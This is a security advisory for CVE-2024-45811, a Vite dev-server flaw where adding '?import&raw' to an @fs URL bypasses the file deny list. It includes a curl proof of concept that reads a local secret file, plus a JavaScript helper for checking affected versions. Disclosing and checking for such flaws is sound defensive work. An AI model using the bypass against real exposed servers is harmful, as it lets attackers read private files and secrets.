
CVE-2024-45811

Vite's `server.fs.deny` is bypassed when using `?import&raw`

Description

### Summary
The contents of arbitrary files can be returned to the browser.


### Details
`@fs` denies access to files outside of the Vite serving allow list. Adding `?import&raw` to the URL bypasses this restriction and returns the file content if the file exists.

### PoC
```sh
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"
403 Restricted
The request url "/tmp/secret.txt" is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...
```


Patch Available

Fix available through Seal Security. No upgrade required, protect your application instantly.

Vulnerability Details

| Field | Value |
| --- | --- |
| Score | 5.3 |
| Score Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
| Affected Versions | vite >= 5.4.0 < 5.4.6; vite >= 5.3.0 < 5.3.6; vite >= 5.2.0 < 5.2.14; vite >= 4.0.0 < 4.5.4; vite < 3.2.11; vite >= 5.0.0 < 5.1.8 |
| Severity | Medium |
| Ecosystem | JavaScript |
| Publish Date | September 17, 2024 |
| Modified Date | September 19, 2024 |
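
The affected ranges are per release line, so a version can be newer than one range's upper bound and still fall inside the next range. The following is an added example, not part of the original advisory or of Vite's code, that checks an exact installed version against the "Affected Versions" field; `checkViteVersion` is a hypothetical helper name and the sample versions are constructed.

```javascript
// Ranges transcribed from the "Affected Versions" field of this advisory.
// Each entry: [lowest affected version (inclusive, null = none), upper bound (exclusive)].
const AFFECTED_RANGES = [
  [null, "3.2.11"],
  ["4.0.0", "4.5.4"],
  ["5.0.0", "5.1.8"],
  ["5.2.0", "5.2.14"],
  ["5.3.0", "5.3.6"],
  ["5.4.0", "5.4.6"],
];

// Parse an exact version such as "5.4.2", "v4.5.3" or "5.4.6-beta.1".
function parseVersion(text) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.-]+)?(\+[0-9A-Za-z.-]+)?$/.exec(String(text).trim());
  if (!m) throw new Error(`not an exact semver version: ${text}`);
  return { nums: [Number(m[1]), Number(m[2]), Number(m[3])], pre: Boolean(m[4]) };
}

// Returns -1, 0 or 1. Numeric comparison (so 5.2.14 > 5.2.9); a pre-release
// sorts before the release with the same numbers, as in semver.
function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a.nums[i] !== b.nums[i]) return a.nums[i] < b.nums[i] ? -1 : 1;
  }
  if (a.pre === b.pre) return 0;
  return a.pre ? -1 : 1;
}

// Hypothetical helper: reports whether `installed` falls in a listed range and,
// if so, the exclusive upper bound of that range (the first unaffected version).
function checkViteVersion(installed) {
  const v = parseVersion(installed);
  for (const [low, bound] of AFFECTED_RANGES) {
    const aboveLow = low === null || compareVersions(v, parseVersion(low)) >= 0;
    if (aboveLow && compareVersions(v, parseVersion(bound)) < 0) {
      return { affected: true, firstUnaffected: bound };
    }
  }
  return { affected: false, firstUnaffected: null };
}

// Constructed sample inputs, e.g. values read from package-lock.json.
for (const version of ["5.4.2", "5.4.6", "5.1.8", "5.2.9", "3.2.11", "2.9.18"]) {
  console.log(version, checkViteVersion(version));
}
```

Pass the resolved version from the lockfile rather than the range in `package.json`; range specifiers such as `^5.4.0` are rejected by `parseVersion`.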